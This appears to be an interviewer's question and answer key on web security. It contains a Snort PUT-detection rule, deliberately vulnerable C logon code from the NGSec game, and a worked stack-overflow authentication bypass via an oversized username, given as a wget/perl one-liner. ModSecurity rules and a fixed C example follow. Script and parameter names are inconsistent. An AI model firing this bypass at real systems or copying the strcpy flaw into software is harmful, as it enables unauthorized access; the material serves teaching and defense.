alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)

 

 

  5. You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application.  The file is called “logon_validate” and a typical logon request looks like this –

 

“GET /cgi-bin/logon_validate?login=test&password=test”

The source code is shown below –

 

#include <stdlib.h>
#include <string.h>

/* ****QUERY_STRING****, GOOD_USER and GOOD_PASS are placeholders in the pseudo-code. */

void show_error(void) {
    // AUTHENTICATION ERROR
    exit(-1);
}

int main(int argc, char **argv) {
    char error_on_auth='1';
    char user[128];
    char pass[128];
    char *ch_ptr_begin;
    char *ch_ptr_end;

    /**********************************/
    /* Get Username from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(****QUERY_STRING****,"login=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=6;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end==NULL)
        show_error();
    *(ch_ptr_end++)='\0';
    strcpy(user,ch_ptr_begin);   /* unbounded copy into a 128-byte buffer */

    /**********************************/
    /* Get Password from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=9;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end!=NULL) *(ch_ptr_end++)='\0';
    strcpy(pass,ch_ptr_begin);   /* unbounded copy into a 128-byte buffer */

    if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0)) error_on_auth='0';

    if (error_on_auth=='0') {
        // AUTHENTICATION OK!!
    } else {
        // AUTHENTICATION ERROR
        show_error();
    }

    // return(0); hehe could be evil ;PPPPP
    exit(0);
}

 

 

This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level6/replicant.php

 

Do you see any problems with this script?  How could an attacker exploit this script to bypass the authentication mechanisms in this script?  What are some mitigation options?

 

Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.

 

Reference “Smashing The Stack For Fun And Profit” for technical details –

http://www.phrack.org/phrack/49/P49-14

 

The security issue with this script is a buffer overflow that affects the “error_on_auth” flag.  The error_on_auth flag is initially set to “1”, which means that the user is not authenticated.  The “user” buffer is declared directly after error_on_auth and has been allocated 128 bytes.  Due to the ordering of the declarations of error_on_auth and user, they occupy adjacent locations on the running stack.  The result is that if the attacker submits a username that is 129 bytes (with the last byte being “0”), they can overwrite the error_on_auth data.  A Unix command such as the following would achieve this goal –

 

http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

 

or

 

# wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e 'print "0"x129'`

 

Mitigation options include the following:

  • Update the validate_logon source code to fix the problem, such as using strncpy() instead of strcpy().
  • If the source code could not be updated, then security filters would need to be implemented on the web server.
  • Using Mod_Security, you could implement some security filters for the “validate_logon” URL such as these:
    • Only allow letters in the username argument.  This would prevent the client from overwriting the error_on_auth data with a zero.

 

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]+$"
</Location>

    • You could also add another rule to restrict the size of the username/password arguments to be fewer than 129 characters.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]+$"
SecFilterSelective ARG_LOGIN|ARG_PASSWORD ".{129,}"
</Location>

 

 

A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as “anomalous” and deny them.  A brief listing of WAF vendors includes Teros, NetContinuum, Imperva, Watchfire, Breach, Axiliance, and others.
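The first mitigation option above (fixing the source) is sketched here as an added example; it is not part of the original article or of the NGSec code. Because strncpy() does not NUL-terminate when it truncates, this version measures the value first and rejects anything that does not fit. The names get_field, authenticate and FIELD_MAX and the credentials are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 128                 /* same buffer size as the original */
#define GOOD_USER "alice"             /* constructed credentials for the demo */
#define GOOD_PASS "constructed-pass"

/* Copy the value of `key` (e.g. "login=") from query string `qs` into `out`.
   Returns 0 on success, -1 if the key is absent or the value would not fit.
   Oversized values are rejected, never truncated, and `qs` is not modified. */
int get_field(const char *qs, const char *key, char *out, size_t outlen) {
    size_t klen = strlen(key);
    const char *p = qs;
    while ((p = strstr(p, key)) != NULL) {
        if (p == qs || p[-1] == '&')  /* key must start a parameter */
            break;
        p += klen;
    }
    if (p == NULL)
        return -1;
    p += klen;
    size_t vlen = strcspn(p, "&");    /* value ends at '&' or end of string */
    if (vlen >= outlen)               /* need room for the terminating NUL */
        return -1;
    memcpy(out, p, vlen);
    out[vlen] = '\0';
    return 0;
}

/* Returns 1 only when both fields parse and match; every other path is 0. */
int authenticate(const char *qs) {
    char user[FIELD_MAX], pass[FIELD_MAX];
    if (qs == NULL ||
        get_field(qs, "login=", user, sizeof user) != 0 ||
        get_field(qs, "password=", pass, sizeof pass) != 0)
        return 0;
    return strcmp(user, GOOD_USER) == 0 && strcmp(pass, GOOD_PASS) == 0;
}

int main(void) {
    char long_login[6 + 129 + 16] = "login=";
    memset(long_login + 6, '0', 129);              /* 129-byte username */
    strcpy(long_login + 6 + 129, "&password=x");   /* fits: 11 chars + NUL */
    printf("oversized login accepted: %d\n", authenticate(long_login));
    printf("valid login accepted:     %d\n",
           authenticate("login=alice&password=constructed-pass"));
    return 0;
}
```

The result is computed from the comparison itself rather than stored in a flag next to the buffers, so no adjacent variable decides the outcome.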